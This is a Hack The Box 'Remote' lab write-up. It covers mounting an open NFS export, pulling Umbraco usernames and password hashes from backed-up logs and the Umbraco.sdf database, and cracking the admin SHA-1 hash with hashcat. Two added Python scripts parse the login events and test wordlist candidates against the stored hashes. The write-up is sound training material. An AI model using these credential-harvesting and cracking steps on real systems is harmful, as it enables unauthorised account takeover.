NFS


Nmap found a Network File System (NFS) server on port 2049 of the target. The NFS service is also registered with the RPC portmapper on port 111, which is what showmount queries to obtain the export list.

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ showmount -e $IP
export list for 10.10.10.180:
/site_backups (everyone)

The /site_backups directory is the only NFS export, and it is exported to everyone, so any host that can reach port 2049 can mount it without any credentials.

Mounting


┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ sudo mkdir -p /mnt/remote
 
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ sudo mount -t nfs $IP:/site_backups /mnt/remote

I created a temporary directory to mount the NFS share, then mounted the remote export on /mnt/remote on Kali. Since the share only needs to be read, mounting it with -o ro is a sensible precaution against accidentally modifying the backup.

site_backups


┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ ll /mnt/remote 
total 123K
4.0k drwxr-xr-x 3 root   root    4.0k feb  1 11:50 ..
4.0K drwx------ 2 nobody nogroup 4.0K Feb 23  2020 .
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 App_Data
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 Views
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 Umbraco_Client
8.0K drwx------ 2 nobody nogroup 8.0K Feb 20  2020 Umbraco
 512 drwx------ 2 nobody nogroup   64 Feb 20  2020 scripts
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 Media
8.0K drwx------ 2 nobody nogroup 8.0K Feb 20  2020 Config
 512 drwx------ 2 nobody nogroup   64 Feb 20  2020 css
 48K drwx------ 2 nobody nogroup  48K Feb 20  2020 bin
 512 drwx------ 2 nobody nogroup   64 Feb 20  2020 aspnet_client
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 App_Plugins
 512 drwx------ 2 nobody nogroup   64 Feb 20  2020 App_Browsers
 28K -rwx------ 1 nobody nogroup  28K Feb 20  2020 Web.config
 512 -rwx------ 1 nobody nogroup  152 Nov  1  2018 default.aspx
 512 -rwx------ 1 nobody nogroup   89 Nov  1  2018 Global.asax

The directory layout (Umbraco, Umbraco_Client, App_Data, Web.config) is that of an Umbraco CMS installation. Given that the share is named site_backups, it is likely a backup of the web application served on port 80.

logs


┌──(kali㉿kali)-[/mnt/remote/App_Data/Logs]
└─$ ll
total 968K
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 ..
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 .
 12K -rwx------ 1 nobody nogroup  12K Feb 20  2020 UmbracoTraceLog.remote.txt
768K -rwx------ 1 nobody nogroup 768K Feb 20  2020 UmbracoTraceLog.intranet.txt
180K -rwx------ 1 nobody nogroup 180K Feb 20  2020 UmbracoTraceLog.intranet.txt.2020-02-19
 
┌──(kali㉿kali)-[/mnt/remote/App_Data/Logs]
└─$ cat UmbracoTraceLog.remote.txt | grep -i user    
 2020-02-20 02:38:18,746 [P4392/D2/T10] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
 2020-02-20 02:38:18,746 [P4392/D2/T10] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.1
 2020-02-20 02:38:22,787 [P4392/D2/T10] INFO  Umbraco.Web.Editors.AuthenticationController - User admin@htb.local from IP address 192.168.195.1 has logged out
 2020-02-20 02:38:57,527 [P4392/D2/T30] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.137
 2020-02-20 02:38:57,527 [P4392/D2/T30] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.137

I found a log directory at /site_backups/App_Data/Logs.

The trace log for the remote site records successful back-office logins for admin@htb.local, which gives both a username, admin, and a domain, htb.local. The source addresses in these entries (192.168.195.1 and 192.168.195.137) are private RFC 1918 addresses.

┌──(kali㉿kali)-[/mnt/remote/App_Data/Logs]
└─$ cat UmbracoTraceLog.intranet.txt | grep -i user
 
[...REDACTED...]
 
 2020-02-20 00:39:00,708 [P5428/D2/T14] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username ssmith@htb.local from IP address 192.168.195.1
 
[...REDACTED...]

The trace log for the intranet site mentions a second back-office username, ssmith@htb.local.
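Grepping for "user" works for a quick look, but with 768K of trace log it is easier to parse the authentication events properly and summarise them per account. The following is an added example, not code from the original writeup or from Umbraco. The sample lines are the ones quoted above from the two trace logs plus one constructed failed-login line; the wording of that failure message is an assumption, not something seen in the dump.

```python
"""Added example (not from the original writeup): extract Umbraco back-office
authentication events from trace-log lines and summarise them per account."""
import re
from collections import defaultdict

# Umbraco 7 trace-log line: timestamp [P<pid>/D<appdomain>/T<thread>] LEVEL logger - message
LINE_RE = re.compile(
    r"^\s*(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
    r"\[P(?P<pid>\d+)/D(?P<domain>\d+)/T(?P<thread>\d+)\] "
    r"(?P<level>\w+)\s+(?P<logger>\S+) - (?P<msg>.*)$"
)

# Message shapes from BackOfficeSignInManager / AuthenticationController.
# The "User: x logged in" line duplicates "Login attempt succeeded", so it is
# deliberately not counted. The failure wording is an assumption.
EVENT_RES = {
    "login_ok": re.compile(r"Login attempt succeeded for username (?P<user>\S+) from IP address (?P<ip>\S+)"),
    "login_fail": re.compile(r"Login attempt failed for username (?P<user>\S+) from IP address (?P<ip>\S+)"),
    "logout": re.compile(r"User (?P<user>\S+) from IP address (?P<ip>\S+) has logged out"),
}


def parse_events(lines):
    """Yield (timestamp, event, user, ip) for every line that is an auth event."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        for event, pat in EVENT_RES.items():
            e = pat.search(m.group("msg"))
            if e:
                yield m.group("ts"), event, e.group("user"), e.group("ip")
                break


def summarise(lines):
    """Per-account counts plus the set of source IPs: which usernames exist and
    from where the back office was administered."""
    summary = defaultdict(lambda: {"login_ok": 0, "login_fail": 0, "logout": 0, "ips": set()})
    for _ts, event, user, ip in parse_events(lines):
        summary[user][event] += 1
        summary[user]["ips"].add(ip)
    return dict(summary)


def accounts(lines):
    """Sorted list of usernames seen in authentication events."""
    return sorted(summarise(lines))


# Lines 1-6 are quoted from the trace logs above; line 7 is constructed.
SAMPLE_LOG = """\
 2020-02-20 02:38:18,746 [P4392/D2/T10] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
 2020-02-20 02:38:18,746 [P4392/D2/T10] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.1
 2020-02-20 02:38:22,787 [P4392/D2/T10] INFO  Umbraco.Web.Editors.AuthenticationController - User admin@htb.local from IP address 192.168.195.1 has logged out
 2020-02-20 02:38:57,527 [P4392/D2/T30] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.137
 2020-02-20 02:38:57,527 [P4392/D2/T30] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.137
 2020-02-20 00:39:00,708 [P5428/D2/T14] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username ssmith@htb.local from IP address 192.168.195.1
 2020-02-20 00:40:12,001 [P5428/D2/T14] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 10.10.14.2
""".splitlines()

if __name__ == "__main__":
    for user, stats in summarise(SAMPLE_LOG).items():
        print(user, stats)
```

Run it against the real files with `summarise(open(path, errors="replace"))`; the per-user IP sets are what tell you which accounts were actually used and from which networks, which is more useful for picking targets than a raw grep.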

Umbraco.sdf


┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ ll
total 2.0M
4.0K drwx------ 2 nobody nogroup 4.0K Feb 23  2020 ..
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 .
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 TEMP
 512 drwx------ 2 nobody nogroup   64 Feb 20  2020 packages
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 Models
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20  2020 Logs
 512 drwx------ 2 nobody nogroup   64 Feb 20  2020 cache
 36K -rwx------ 1 nobody nogroup  36K Feb 20  2020 umbraco.config
1.9M -rwx------ 1 nobody nogroup 1.9M Feb 20  2020 Umbraco.sdf

I also found the Umbraco.sdf file.

Umbraco.sdf is a SQL Server Compact (SQL CE) database. Umbraco 7 creates it under App_Data when the installer is run without a separate SQL Server, so it holds the CMS's own tables, including the back-office user accounts and their password hashes. A backup of it is therefore as sensitive as a full database dump.

The .sdf extension is the one SQL Server Compact uses for its single-file databases. It is common to develop against an SDF file and switch to a full database server such as Microsoft SQL Server for production, which is why a backup of a development or early-stage site often still contains one.

admin


┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep -i admin   
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
 
[...REDACTED...]

Searching for the string admin turned up the credential rows for the admin user. The JSON next to the stored value records the algorithm, {"hashAlgorithm":"SHA1"}, and the value itself, b8be16afba8c314ad33d812f22a04991b90e2aaa, is 40 hex characters with no salt alongside it, i.e. a plain SHA-1 of the password, which is exactly what hashcat mode 100 expects.

ssmith


┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep -i ssmith 
ssmithsmith@htb.localjxduccruzn8rsrlqnfmvqw==aikyyl6fyy29ka3htb/eriyjuadpttfetpnik9cihts={"hashalgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xxicbpe7m5nq22hfcglg==rf9olinww9rd2pmakuplter6vesd2mtfabke1zl5sxa={"hashalgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
 
[...REDACTED...]

I also found the password hashes for the ssmith user. There are two rows, each storing two Base64 strings, and the JSON next to them says the algorithm is HMAC-SHA256, so these are salted, keyed hashes rather than a plain digest like the admin one.

However, I was unable to work out at this point exactly how those strings are constructed.
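The rows that `strings` prints are several columns run together, so it helps to split them mechanically and dispatch on the recorded algorithm. The following is an added example, not code from the original writeup or from Umbraco. Its treatment of the HMACSHA256 rows (a 24-character Base64 salt followed by a 44-character Base64 digest, with the HMAC key being the 16-byte salt repeated to the 64-byte key length and the message the UTF-16LE password) is my reading of the ASP.NET SqlMembershipProvider.EncodePassword logic that Umbraco 7's MembershipProviderBase follows, and should be treated as an assumption. The admin row is copied from the strings output above; the HMACSHA256 row is constructed here with a known password and fixed salt so the whole path runs offline. Note that the ssmith rows as pasted above are lowercased (the JSON key reads hashalgorithm), and Base64 is case-sensitive, so real rows must be taken from the dump with their original case before any check can succeed.

```python
"""Added example (not from the original writeup or Umbraco): parse the
concatenated user rows from `strings Umbraco.sdf` and test dictionary
candidates against the two formats seen on this box."""
import base64
import hashlib
import hmac
import re

# Tail of a membership row: ...<stored>{"hashAlgorithm":"<alg>"}<email>en-US<guid>
# Case-insensitive because the rows quoted above were pasted lowercased.
TAIL_RE = re.compile(
    r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}'
    r'(?P<email>[^{]+?)en-US(?P<guid>[0-9a-f-]{36})$',
    re.IGNORECASE,
)

# Width of the stored-password field that sits directly before the JSON blob:
# SHA1 is 40 hex chars; HMACSHA256 is base64(16-byte salt) + base64(32-byte digest).
STORED_LEN = {"SHA1": 40, "HMACSHA256": 24 + 44}


def parse_row(row):
    """Split one concatenated row into login, email, algorithm and stored value.
    Returns None for rows with another layout (e.g. rows with no e-mail after the JSON)."""
    row = row.strip()
    m = TAIL_RE.search(row)
    if not m:
        return None
    alg, email = m.group("alg").upper(), m.group("email")
    width = STORED_LEN.get(alg)
    if width is None:
        return None
    head = row[:m.start()]
    stored, prefix = head[-width:], head[:-width]
    # What precedes the stored value is <login><email>; peel the e-mail off the end.
    if not prefix.endswith(email):
        return None
    return {"login": prefix[:-len(email)], "email": email, "alg": alg, "stored": stored}


def hmacsha256_hash(password, salt):
    """ASP.NET membership-style keyed hash (assumption, see lead-in): salt repeated or
    truncated to the 64-byte HMACSHA256 key length, password hashed as UTF-16LE."""
    key = (salt * (64 // len(salt) + 1))[:64]
    return hmac.new(key, password.encode("utf-16-le"), hashlib.sha256).digest()


def check(entry, candidate):
    """True if candidate is the password behind a parsed row."""
    if entry["alg"] == "SHA1":
        return hashlib.sha1(candidate.encode()).hexdigest() == entry["stored"].lower()
    if entry["alg"] == "HMACSHA256":
        salt = base64.b64decode(entry["stored"][:24])
        want = base64.b64decode(entry["stored"][24:])
        return hmac.compare_digest(hmacsha256_hash(candidate, salt), want)
    return False


def crack(entry, wordlist):
    """Return the first wordlist entry that matches, or None."""
    return next((w for w in wordlist if check(entry, w)), None)


def build_row(login, email, password, salt):
    """Construct a membership row in the dump layout (fixture only, not real data)."""
    stored = base64.b64encode(salt).decode() + base64.b64encode(hmacsha256_hash(password, salt)).decode()
    return f'{login}{email}{stored}{{"hashAlgorithm":"HMACSHA256"}}{email}en-US00000000-0000-0000-0000-000000000000'


# Row copied from the strings output above (real data from the dump).
ADMIN_ROW = ('adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa'
             '{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50')
# Constructed row with a known password and a fixed salt (not from the box).
SSMITH_ROW = build_row("ssmith", "ssmith@htb.local", "Winter2020!", bytes(range(16)))
# Constructed mini-wordlist standing in for rockyou.txt.
WORDLIST = ["password", "letmein", "Winter2020!", "baconandcheese"]

if __name__ == "__main__":
    for row in (ADMIN_ROW, SSMITH_ROW):
        entry = parse_row(row)
        print(entry["login"], entry["alg"], crack(entry, WORDLIST))
```

For the real dump, feed `strings Umbraco.sdf` line by line through parse_row and keep the entries that are not None; the SHA1 ones can go straight to hashcat -m 100 as before, while the HMACSHA256 ones need the keyed check above (or a tool that implements the same construction), since a plain salted-SHA-256 mode will not match them.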

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ hashcat -a 0 -m 100 admin.hash /usr/share/wordlists/rockyou.txt
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese   
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 100 (SHA1)
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Wed Feb  1 15:02:21 2023 (4 secs)
Time.Estimated...: Wed Feb  1 15:02:25 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2669.5 kH/s (0.07ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9824256/14344385 (68.49%)
Rejected.........: 0/9824256 (0.00%)
Restore.Point....: 9823488/14344385 (68.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: bad23girl -> bacninh_kc
Hardware.Mon.#1..: Util:100%
 
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Wed Feb  1 15:02:07 2023
Stopped: Wed Feb  1 15:02:27 2023

Hashcat cracked the hash in a few seconds: the web credential for the admin user is baconandcheese.

Unmounting


┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ sudo umount /mnt/remote

I made sure to unmount the NFS share since I am done with it for now.